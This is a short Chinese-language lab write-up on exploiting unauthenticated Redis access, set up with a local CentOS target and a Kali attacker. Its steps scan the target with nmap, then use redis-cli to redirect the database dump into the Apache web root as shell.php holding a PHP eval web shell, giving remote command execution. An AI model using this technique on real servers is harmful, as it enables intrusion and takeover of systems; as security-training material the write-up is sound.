redis-未授权访问漏洞测试小结
·
1.本地环境搭建
靶机:centos7 ip:192.168.221.129
攻击机:kali ip:192.168.221.128
centos7(需安装php)打开apache服务
yum install httpd
//安装apache
systemctl stop firewalld.service
//关闭防火墙
systemctl start httpd
//启动apache
在centos7上使用docker拉取环境(centos7需打开apache服务)
docker pull medicean/vulapps:r_redis_1
docker run -dit -p 6379:6379 -p 2222:22 medicean/vulapps:r_redis_1
2.攻击过程
1.使用nmap扫描centos7
nmap -sV -p- -T4 192.168.221.129

2.使用redis-cli连接redis服务器
redis-cli -h 192.168.221.129 -p 6379
//-h:指定连接的redis服务器
//-p 指定6379端口

keys *
//列出当前数据库的所有键
config set dir /var/www/html
//设置备份文件的放置路径(这个路径是centos7开启的apache服务的根目录)
config set dbfilename shell.php
//设置备份文件的文件名
set shell "<?php @eval($_POST['cmd']);?>"
//shell表示添加一个键,这个键的值为一句话木马
save
//保存
![]()

然后连接webshell即可
以上是写入webshell的方法,还有其他两种方法
更多推荐



所有评论(0)